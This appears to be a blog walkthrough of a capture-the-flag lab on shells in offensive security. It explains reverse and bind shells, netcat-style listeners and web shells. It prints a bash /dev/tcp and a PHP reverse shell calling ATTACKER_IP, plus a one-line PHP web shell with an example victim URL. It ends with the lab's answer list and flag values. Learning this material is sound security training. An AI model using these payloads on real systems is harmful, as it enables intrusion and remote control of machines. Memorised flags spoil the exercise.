🐚 Shells in Offensive Security – Complete Overview & Practical Walkthrough

 


🐚 Shells in Offensive Security – Complete Overview & Practical Walkthrough

Shells play a crucial role in offensive security. Whether you're performing penetration testing or analyzing attacker behavior, understanding shells helps you both exploit and defend systems effectively.

In this blog, we’ll cover:

  • What a shell is

  • Reverse Shells

  • Bind Shells

  • Shell Listeners

  • Shell Payloads

  • Web Shells

  • Practical Lab Flags

  • ✅ All Answers (Before Conclusion)

🔹 What is a Shell?

A shell is a program that allows users to interact with an operating system. In cybersecurity, it usually refers to a command-line session an attacker gains on a compromised system.

With shell access, attackers can:

  • Execute commands remotely

  • Perform Privilege Escalation

  • Exfiltrate sensitive data

  • Maintain persistence

  • Pivot to other machines in the network

🔄 Reverse Shell

A Reverse Shell (connect-back shell) is when the target system initiates a connection back to the attacker’s machine.

How It Works

  1. Attacker sets up a listener:

    nc -lvnp 443

  2. Target executes reverse shell payload.

  3. Target connects back to attacker.

  4. Attacker gains remote shell access.

Why Reverse Shells Are Popular

  • Bypass firewall restrictions (outgoing traffic often allowed)

  • Blend with legitimate traffic (ports like 80, 443)

🔗 Bind Shell

A Bind Shell binds a port on the compromised system and waits for the attacker to connect.

How It Works

  1. Target opens a listening port (e.g., 8080).

  2. Attacker connects using:

    nc -nv TARGET_IP 8080

  3. Shell is exposed.

⚠ Ports below 1024 require root privileges.

🎧 Shell Listeners

Netcat isn’t the only listener tool available.

1️⃣ rlwrap

Enhances Netcat with command history and arrow key support.

rlwrap nc -lvnp 443

2️⃣ ncat

Improved Netcat from Nmap project.

ncat -lvnp 4444
ncat --ssl -lvnp 4444

Supports SSL encryption.

3️⃣ socat

Advanced socket utility.

socat -d -d TCP-LISTEN:443 STDOUT

💣 Shell Payloads

Shell payloads expose or connect shells through different scripting languages.

🟢 Bash Reverse Shell

bash -i >& /dev/tcp/ATTACKER_IP/443 0>&1

🟣 PHP Reverse Shell

Uses:

  • exec()

  • shell_exec()

  • system()

  • passthru()

  • popen()

Example:

php -r '$sock=fsockopen("ATTACKER_IP",443);exec("sh <&3 >&3 2>&3");'

🔵 Python Reverse Shell

Uses socket + subprocess:

import socket,subprocess,os

🌐 Web Shell

A Web Shell is a malicious script uploaded to a vulnerable web server that allows command execution through a browser.

Example PHP Web Shell

<?php
if (isset($_GET['cmd'])) {
    system($_GET['cmd']);
}
?>

Accessed as:

http://victim.com/shell.php?cmd=whoami

Common Web Shells

  • p0wny-shell

  • b374k shell

  • c99 shell

Common Vulnerability Used

  • Unrestricted File Upload

✅ All Answers (Before Conclusion)

Shell Overview

  • Command-line interface that allows interaction → Shell

  • Using compromised system to attack others → Pivoting

  • Escalating privileges activity → Privilege Escalation

Reverse Shell

  • Type of shell that connects back → Reverse Shell

  • Tool used to set up listener → Netcat

Bind Shell

  • Shell that opens port on target → Bind Shell

  • Ports below requiring root → 1024

Shell Listeners

  • Flexible networking tool → socat

  • Tool providing readline features → rlwrap

  • Improved Netcat version → ncat

Shell Payloads

  • Python module used → subprocess

  • Language using exec/system/popen → PHP

  • Language using exported env variables → Python

Web Shell

  • Vulnerability allowing malicious file upload → Unrestricted File Upload

  • Malicious uploaded script → Web Shell

Practical Task Flags

  • Command Injection Flag:

    THM{0f28b3e1b00becf15d01a1151baf10fd713bc625}

  • Web Upload Flag:

    THM{202bb14ed12120b31300cfbbbdd35998786b44e5}

🎯 Conclusion

Understanding shells is fundamental in offensive security. Reverse shells, bind shells, web shells, and payload techniques form a critical part of the attack chain. Mastering how they work helps you:

  • Perform penetration testing effectively

  • Detect attacker activity

  • Secure systems against exploitation

Shell knowledge is not just about attacking — it’s about understanding how attackers think and strengthening defense strategies.

Comments

Post a Comment

Popular Posts